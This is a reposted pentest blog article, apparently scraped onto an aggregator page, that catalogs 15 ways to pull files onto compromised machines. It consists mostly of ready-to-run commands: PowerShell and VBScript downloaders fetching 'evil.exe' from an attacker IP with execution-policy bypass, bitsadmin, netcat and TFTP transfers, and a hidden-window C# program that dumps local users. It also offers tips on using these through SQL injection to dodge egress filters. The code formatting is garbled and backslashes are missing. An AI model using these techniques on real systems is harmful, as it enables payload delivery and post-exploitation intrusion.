Pentest - 15 ways to Download a File
来源:互联网 发布:外墙线条展开面积算法 编辑:程序博客网 时间:2024/05/17 22:53
Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, and system admins that just want to move files.
There are many other ways to move files onto machines during pentests, but this list includes some of my favorites. Below is a summary of the file transfer techniques that will covered in this blog.
- Powershell file download
- Visual Basic filw Download
- Perl file download
- Python file download
- Ruby file download
- PHP file download
- FTP file download
- TFTP file download
- Bitsadmin file download
- Wget file download
- Netcat file download
- Windows share file download
- Notepad dialog box file download
- Exe to Text, Text to EXE with PowerShell and Nishang
- Csc.exe to compile from source file.
Note: Many of the techniques listed should also be considered as options when executing commands through SQL injection. For the multi-line steps, ECHO the commands to a file, and then execute the file.
PowerShell File Download
PowerShell is one of those scripting languages that can be overlooked as a threat by administrators. However, it can provide a plethora of options and capabilities to someone who knows how to use it. The biggest benefit is that it is native to Windows since Windows Server 2003. Below is an example of a simple script that can be used to download a file to the local file system from a webserver on the internet:
$p = New-Object System.Net.WebClient $p.DownloadFile("http://domain/file" "C:%homepath%file") To execute this script, run the following command in a PowerShell window:
PS C:> .test.ps1Or, we can echo it to the file.
echo $storageDir = $pwd > wget.ps1echo $webclient = New-Object System.Net.WebClient >> wget.ps1echo $url = "http://192.168.10.5/evil.exe" >> wget.ps1echo $file = "new-exploit.exe" >> wget.ps1echo $webclient.DownloadFile($url, $file) >> wget.ps1powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1Sometimes, the PowerShell execution policy is set to restricted. In this case, you will not be able to execute commands or scripts through PowerShell… unless you just set it to unrestricted using the following command:
C:> powershell set-executionpolicy unrestrictedVisual Basic File Download
The final version of Visual Basic has come standard on Windows machines since 1998. The following script can download a file of your choosing. However, the script is quite larger than the PowerShell one.
echo strUrl = WScript.Arguments.Item(0):StrFile = WScript.Arguments.Item(1):Set Post = CreateObject(^"Msxml2.XMLHTTP^"):Set Shell = CreateObject(^"Wscript.Shell^"):Post.Open ^"GET^",strUrl,0:Post.Send():Set aGet = CreateObject(^"ADODB.Stream^"):aGet.Mode = 3:aGet.Type = 1:aGet.Open():aGet.Write(Post.responseBody):aGet.SaveToFile StrFile,2 > download.vbsCscript is a command line Windows Script Host that allows you to pass command line options and allows you to set script properties. It is not necessary to use this to run a vbs script in Windows 7 and possibly others, but using it allows your scripts to run on Windows XP machines and above.
To execute this script, run the following command in a command shell:
C:> cscript download.vbs http://demo/evil.exe evil.exePerl File Download
#!/usr/bin/perl use LWP::Simple; getstore("http://domain/file", "file");Python File Download
#!/usr/bin/python import urllib2 u = urllib2.urlopen('http://domain/file') localFile = open('local_file', 'w')localFile.write(u.read()) localFile.close()Ruby File Download
#!/usr/bin/ruby require 'net/http' Net::HTTP.start("www.domain.com") { |http| r = http.get("/file") open("save_location", "wb") { |file| file.write(r.body) } }PHP File Download
<?php $data = @file("http://example.com/file"); $lf = "local_file"; $fh = fopen($lf, 'w'); fwrite($fh, $data[0]); fclose($fh); ?>FTP File Download
ftp 127.0.0.1 username password get file exitTFTP File Download
tftp -i host GET C:%homepath%file location_of_file_on_tftp_serverBitsadmin File Download
bitsadmin /transfer n http://domain/file c:%homepath%fileWget File Download
wget http://example.com/fileNetcat File Download
cat file | nc -l 1234nc host_ip 1234 > fileWindows Share File Download
net use x: \127.0.0.1share /user:example.comuserID myPasswordNotepad Dialog Box File Download
- Open notepad
- Go to file - open
- In the File Name box near the bottom, type in the full URL path to your file
Exe to Txt, and Txt to Exe with PowerShell and Nishang
PS > .ExetoText.ps1 evil.exe evil.txtPS > .TexttoExe.ps1 evil.text evil.exeCsc.exe to Compile Source from a File
C sharp compiler (csc) is the command line compiler included with Microsoft .NET installations within Windows. This could be useful if you are unable to copy over an executable file, but can still copy over text. Using this method, combined with SQL injection, can move an exe to a box without having to try to bypass egress filters or authenticated proxies that might block outbound connectivity.
The default location for this executable is the following:
C:\Windows\Microsoft.NET\Framework\versionUsing the following example code, the compiled executable will use cmd.exe to query the local users on the box and write the results to a file in the C:Temp directory. This could obviously be modified to interact with different exe’s on the box, or completely re-written to use your own exploit code.
public class Evil { public static void Main() { System.Diagnostics.Process process = new System.Diagnostics.Process(); System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo(); startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden; startInfo.FileName = "cmd.exe"; startInfo.Arguments = @"/C net user > users.txt"; process.StartInfo = startInfo; process.Start(); } }To compile your source code, type:
csc.exe /out:C:evilevil.exe C:evilevil.cs./evilevil.exeReferences
- https://blog.netspi.com/15-ways-to-download-a-file/
- http://blog.csdn.net/nixawk/article/details/45131059
- http://superuser.com/questions/59465/is-it-possible-to-download-using-the-windows-command-line
- Pentest - 15 ways to Download a File
- Java to download a file from internet
- Three ways to use Perl to open a temporary file
- How to download a file with Node.js?
- How to download a file with Node.js?
- 6 ways to download intraday data
- How to make a direct download link to a static file
- TRKProtocolPlugin : Unable to download file
- adb download file to /system
- Choose path to download file
- Choose path to download file .
- 4 ways to send a PDF file to the IE Client in ASP.NET 2.0
- 4 ways to send a PDF file to the IE Client in ASP.NET 2.0
- Using CURL to download a remote file from a valid URL in c++
- Download a file from a FTP Server
- How to Download a PDK
- 10 ways to download historical stock quotes data for free
- C# SharpSsh Private-public a pair key to Upload and Download File
- C# : Form1 => Form2 -> Form1
- Android开发环境搭建
- SQL基础学习7
- 简易的壁纸更换
- 标准I/O
- Pentest - 15 ways to Download a File
- 常用HTML标签显示效果
- nyoj364田忌赛马【贪心】
- 各种距离
- 006 Notepad++快捷键
- 关于PHP的类的学习1
- Jaxb2 实现JavaBean与xml互转
- 高度为H的AVL树最少节点数
- UFT工作原理
